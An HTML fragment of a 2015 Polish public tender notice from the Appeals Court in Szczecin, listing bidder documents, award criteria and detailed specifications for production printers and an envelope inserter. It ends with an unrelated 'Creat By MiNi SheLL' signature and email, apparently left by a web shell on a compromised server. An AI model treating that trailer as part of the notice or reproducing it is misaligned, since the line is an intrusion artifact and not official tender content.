<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Dokument potwierdzający deklarację zgodności CE oferowanych urządzeń</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa wraz formularzem parametrów urządzeń (załącznik nr 1 i 1a do SIWZ),
w przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale VI pkt 2 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział VI pkt 16siwz)
3)	oświadczenie wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
w przypadku składania oferty wspólnej należy złożyć jeden dokument (na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ.)
(Ww. dokumenty muszą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - OKRES OBSŁUGI SERWISOWEJ I GWARANCJI - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.sa.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Apelacyjny w Szczecinie, ul. Mickiewicza 163 pok. 315 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 11:00, miejsce: Sąd Apelacyjny w Szczecinie, 71-165 Szczecin, ul. Mickiewicza 163 pok. 206.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa urządzeń druku masowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 2 sztuk urządzeń masowych
Parametr lub warunek	Minimalne wymagania
Ogólne	Monochromatyczny produkcyjny system wielofunkcyjny (dostępne opcje drukowania, kopiowania i skanowania do pliku)
Wydajność	Minimum 110 stron A4 1+0 na minutę
Obciążalność	Do 2 000 000 wydruków A4 miesięcznie
Interfejs użytkownika	Kolorowy ekran dotykowy
Rozdzielczość druku	Minimum 1200 x 1200 dpi
Eksploatacja	- Możliwość wymiany tonera podczas pracy urządzenia (druku/kopiowania)
- Możliwość samodzielnej i łatwej wymiany przez operatora materiałów eksploatacyjnych zużywających się podczas użytkowania urządzenia tj. toner, element światłoczuły lub odpowiednik, ewentualny zbiornik na zużyty toner lub odpowiednik itp.
Obsługiwane formaty	- Minimalny obsługiwany format papieru nie większy niż A6 tj. 105 x 148 mm
- Maksymalny obsługiwany format papieru nie mniejszy niż 324 x 483 mm
- Obsługiwana gramatura papieru z zakresu co najmniej 60-250 g/m2
Podajniki	- Minimum 6 tac podających papier do zadruku
- Minimum 6 000 arkuszy papieru o gramaturze 80 g/m2 pojemności całkowitej tac podających papier do zadruku
- Możliwość uzupełniania papieru w podajnikach podczas pracy urządzenia (druku/kopiowania)
- Możliwość logicznego łączenia podajników w jeden z tym samym papierem
- Minimum 1 taca insertera (podajnika na wcześniej zadrukowane arkusze) o pojemności min. 200 arkuszy
Moduł odbierający wydruki	- Moduł odbierający wydruki o pojemności minimum 3 500 arkuszy papieru o gramaturze 80 g/m2
- Odbiór wydruków z przesunięciem umożliwiającym odróżnianie kolejnych egzemplarzy
- Zszywanie 1 lub 2 zszywkami do min. 100 arkuszy na dowolnej krawędzi
- Zszywanie formatów A4 i A3
- Dziurkowanie 2 lub 4 otwory
- Prostowanie arkuszy po wydruku (możliwość zmiany kierunku odkształcania)
Skanowanie	- Automatyczny podajnik oryginałów o pojemności minimum 100 arkuszy
- Prędkość skanowania minimum 100 obrazów A4 1+1 na minutę w rozdzielczości 600x600 dpi
- Możliwość skanowania do pliku w formacie PDF, PDF/A, TIFF, XPS
- Skanowanie z rozdzielczością minimum 600 x 600 dpi
Zewnętrzny kontroler wydruku - parametry techniczne	Zewnętrzny kontroler wydruku powinien posiadać następujące parametry techniczne:
- Co najmniej procesor dwurdzeniowy powyżej 2 Ghz
- Pamięć RAM co najmniej 4GB
- Dysk twardy o pojemności co najmniej 500 GB
- Interfejs sieciowy Ethernet 10/100Base-T, 1Gigabit
- Powinien obsługiwać bezpośrednio strumienie danych Adobe PostScript 1/2/3, PDF 1.8, PDF/X, PCL5c/5e/6XL, TIFF v6.0, ASCII, PPML
Zewnętrzny kontroler wydruku - funkcjonalności	Zewnętrzny kontroler wydruku powinien pozwalać na poniższe funkcjonalności: 
- automatyzacja (ustawienie różnych parametrów druku) procesu druku za pomocą min. 50 kolejek druku, które można również ustawić jako udostępnione katalogi w sieci
- szablony impozycyjne tj. 2-up, 4-up, do oprawy zeszytowej, do oprawy szytej klejonej oraz dodawanie znaczników cięcia, marginesów zewnętrznych i wewnętrznych
- tworzenie listy mediów z których najczęściej korzystamy
- Preflight (sprawdzanie drukowanego pliku pod kontem użytych czcionek i ich załączenia do dokumentu) oraz możliwość instalowania nowych czcionek w tym kodów kreskowych jedno i dwuwymiarowych
- Soft-proof (możliwość podglądu zrastrowanej pracy przed jej wydrukowaniem zawierający efekt wprowadzonych ustawień tj. format papieru, impozycja, znaczniki cięcia itd.
- dynamiczne sterowanie funkcjami odbiornika wydruków tj. sortowanie lub zszywanie na poziomie podzestawów zawierających różną ilość zadrukowanych arkuszy
Bezpieczeństwo	Urządzenie powinno umożliwiać: filtrowanie adresów IP, blokowanie portów i protokołów, nadpisywanie danych, ograniczenie dostępu do kontrolera druku na podstawie kont użytkowników z bezpiecznym hasłem
Certyfikaty	Urządzenie powinno spełniać minimum certyfikat CE
Dodatkowe	- Możliwość tworzenia własnych narzędzi oraz instalowania ich na urządzeniu w celu modyfikacji panelu urządzenia oraz zwiększania jego funkcjonalności w celu dopasowania się do procesów związanych z drukiem i skanowaniem
- Firma serwisująca musi posiadać certyfikat ISO 9001 na świadczenie usług serwisowych
- Wykonawca w momencie dostawy urządzenia będzie musiał doręczyć oświadczenie producenta, iż oferowany egzemplarz jest fabrycznie nowy - wyprodukowany nie wcześniej niż w roku 2015.
- W zestawie wszystkie niezbędne kable do uruchomienia urządzenia
Obsługa serwisowa i gwarancja	Wraz z dostawą urządzeń Zamawiający wymaga obsługi serwisowo materiałowej w okresie 24 miesięcy.
Uruchomienie i montaż urządzeń drukujących we wskazanym przez Zamawiającego pomieszczeniu
Warunki świadczenia obsługi serwisowo - materiałowej:
- Świadczenie obsługi od dnia dostawy przez okres 24 miesięcy.
- W okresie 24 miesięcy Zamawiający będzie miał możliwość wydrukowania do 2.500.000 obrazów A4 bez ograniczania rozdziału prac na urządzenia.
- Obsługa serwisowo - materiałowa musi być wykonywana przez osoby przeszkolone i uprawnione, Wykonawca musi posiadać certyfikat ISO na świadczenie usług serwisowych.
W ramach obsługi serwisowo - materiałowej liczonej od daty uruchomienia urządzeń drukujących Wykonawca zobowiązany jest do:
- zapewnienia stałej sprawności operacyjnej zaoferowanych urządzeń,
- okresowych przeglądów zaoferowanych urządzeń,
- usuwania niesprawności wynikających ze zużywania się części zamiennych oraz materiałów eksploatacyjnych, usuwania awarii sprzętu i oprogramowania,
- pełnej dostawy i wymiany części zamiennych oraz materiałów eksploatacyjnych,
- świadczenia usług serwisowych w dni robocze Zamawiającego, tj. od poniedziałku do piątku w godzinach od 7:30 do 15:30,
- zapewnienia czasu reakcji serwisowej w następnym dniu roboczym po zgłoszeniu telefonicznym, potwierdzonym niezwłocznie faxem lub e-mailem,
- zapewnienie czasu naprawy lub wymiany zużytych materiałów eksploatacyjnych i części zamiennych do 48 (czterdziestu ośmiu) godzin od momentu zgłoszenia, z zastrzeżeniem, że w uzasadnionych przypadkach, np. udokumentowana potrzeba sprowadzenia części z zagranicy  Zamawiający może wyrazić zgodę na wydłużenie czasu naprawy lub wymiany do 72 (siedemdziesięciu dwóch) godzin liczonych od momentu zgłoszenia,
- usługi serwisowe świadczone będą w siedzibie wskazanej przez Zamawiającego w Szczecinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. OKRES OBSŁUGI SERWISOWEJ I GWARANCJI - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa kopertownicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jednej sztuki kopertownicy. Parametr lub warunek	Minimalne wymagania
Wydajność	Minimum. 5 400 cykli na godz. (pod pojęciem cykl należy rozumieć złożenie na pół jednej kartki formatu A4 i zapakowanie jej do koperty formatu C5).
Obciążenie miesięczne	Minimum 200 000 cykli.
Ilość i rodzaj podajników dokumentów	Minimum 4 gniazda podajników. Możliwość wymiennego instalowania podajników arkuszy i szablonów w ramach wolnych gniazd w module głównym. (np. jednorazowo cztery podajniki arkuszy). W zestawie wymagane min. 2 podajniki arkuszy oraz min. 2 podajniki szablonów.
Budowa podajników dokumentu głównego	Wyposażone w detekcję podwójnego pobrania, konstrukcja podajnika umożliwiająca dokładanie arkuszy papieru bez konieczności zatrzymywania kopertownicy.
Odbiornik	Kosz odbiorczy o pojemności min. 200 kopert.
Odbiornik Taśmowy	Możliwość zainstalowania wzdłużnie lub poprzecznie odbiornika taśmowego długości min. 1200 mm. Odbiornik taśmowy musi byś dostarczony jako wyposażenie do urządzenia.
Podstawa	Dedykowany stół do kopertownicy z elektrycznie regulowaną wysokością.
Metody sterowania pracą kopertownicy	Możliwość zaprogramowania min. 24 programów, z późniejszą możliwością edycji.

Sterowanie kompletowaniem przesyłek	Minimum moduł optyczny rozpoznający znaczniki OMR/BCR 
Panel sterowania	- Panel sterowania informujący o wszystkich czynnościach kopertownicy, o ewentualnych błędach jak również o możliwych sposobach ich usuwania.
- Panel powinien być wyposażony w kolorowy ekran LCD i klawiaturę z przyciskami funkcyjnymi. Informacje na panelu powinny być przedstawiane w trybie graficznym i tekstowym.
- Panel powinien zapewniać pełny podgląd zaprogramowanych prac oraz diagnostykę urządzenia.
- Polski opis klawiatury oraz wszystkie komunikaty wyświetlane na ekranie musza być w języku polskim.
Obsługiwana gramatura papieru	- Podajnik arkuszy min. od 60 g/m2 do 120 g/m2
- Podajnik szablonów min. od 60 g/m2 do 180 g/m2
- Podajnik kopert min. od 70 g/m2 do 100 g/m2
Obsługiwane wymiary papieru	- Arkusze szerokość - min. od 125 mm do 250 mm
- Arkusze długość - min. 135 mm do 356 mm
- Szablony szerokość - min. 127 mm do 250 mm
- Szablony długość - min. 72 mm do 153 mm
- Minimalna grubość szablonu min. 2,54 mm
Obsługiwane wymiary kopert	C6/5 (114 mm x 229 mm), C5 (162mm x 229 mm), C4 (229mm x 324 mm)
Podajnik kopert	Wysokowydajny podajnik kopert o pojemności min. 500 kopert
Ilość rodzajów złożeń	Minimum 5 V, Z, C, Podwójne, Bez Składania
Ilość arkuszy składanych jednorazowo	Złożenie C lub Z - min. 8
Złożenie V - min. 10
Ilość kartek do zapakowania	- Koperta C6/5 - min. 8 
- Koperta C5 - min. 10
- Koperta C4 - min. 25
Kopertowanie arkuszy zszytych zszywaczem	Kopertowanie zszytych arkuszy w ilości min. 8 
Certyfikaty i normy	Urządzenie powinno posiadać minimum certyfikat CE.
Dodatkowe wymagania	- Wykonawca w momencie dostawy urządzenia będzie musiał doręczyć oświadczenie producenta, iż oferowany egzemplarz jest fabrycznie nowy - wyprodukowany nie wcześniej niż w roku 2015.
- Firma serwisująca musi posiadać certyfikat ISO 9001 na świadczenie usług serwisowych oraz autoryzację na serwis producenta oferowanego urządzenia
- W zestawie wszystkie niezbędne kable do uruchomienia urządzenia
Dalsze możliwości rozbudowy	Możliwość dalszej rozbudowy maszyny o kolejne podajniki dokumentu (dwa lub cztery podajniki każdy po min.1000 arkuszy papieru), podajnik wysokonakładowy na min. 4500 arkuszy, możliwość nauczenia maszyny czytania dowolnych kodów OMR.
Obsługa serwisowa i gwarancja	Wraz z dostawą urządzenia Zamawiający wymaga obsługi serwisowo materiałowej w okresie 24 miesięcy.

Warunki świadczenia obsługi serwisowo - materiałowej:
- montaż i uruchomienie kopertownicy we wskazanym przez Zamawiającego pomieszczeniu 
- Świadczenie obsługi od dnia podpisania protokołu odbioru przez okres 24 miesięcy.
- W okresie 24 miesięcy Zamawiający będzie miał możliwość wykonania do 1.000.000 zakopertowań.
- Obsługa serwisowo - materiałowa musi być wykonywana przez osoby przeszkolone i uprawnione, Wykonawca musi posiadać certyfikat ISO na świadczenie usług serwisowych.

W ramach obsługi serwisowo - materiałowej liczonej od daty uruchomienia urządzenia kopertującego Wykonawca zobowiązany jest do:
- zapewnienia stałej sprawności operacyjnej zaoferowanego urządzenia,
- okresowych przeglądów zaoferowanego urządzenia,
- usuwania niesprawności wynikających ze zużywania się części zamiennych oraz materiałów eksploatacyjnych, usuwania awarii sprzętu i oprogramowania,
- pełnej dostawy i wymiany części zamiennych oraz materiałów eksploatacyjnych,
- świadczenia usług serwisowych w dni robocze Zamawiającego, tj. od poniedziałku do piątku w godzinach od 7:30 do 15:30,
- zapewnienia czasu reakcji serwisowej w następnym dniu roboczym po zgłoszeniu telefonicznym, potwierdzonym niezwłocznie faxem lub e-mailem,
- zapewnienie czasu naprawy lub wymiany zużytych materiałów eksploatacyjnych i części zamiennych do 48 (czterdziestu ośmiu) godzin od momentu zgłoszenia, z zastrzeżeniem, że w uzasadnionych przypadkach, np. udokumentowana potrzeba sprowadzenia części z zagranicy  Zamawiający może wyrazić zgodę na wydłużenie czasu naprawy lub wymiany do 72 (siedemdziesięciu dwóch) godzin liczonych od momentu zgłoszenia,
- usługi serwisowe świadczone będą w siedzibie wskazanej przez Zamawiającego w Szczecinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.13.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. OKRES OBSŁUGI SERWISOWEJ I GWARANCJI - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com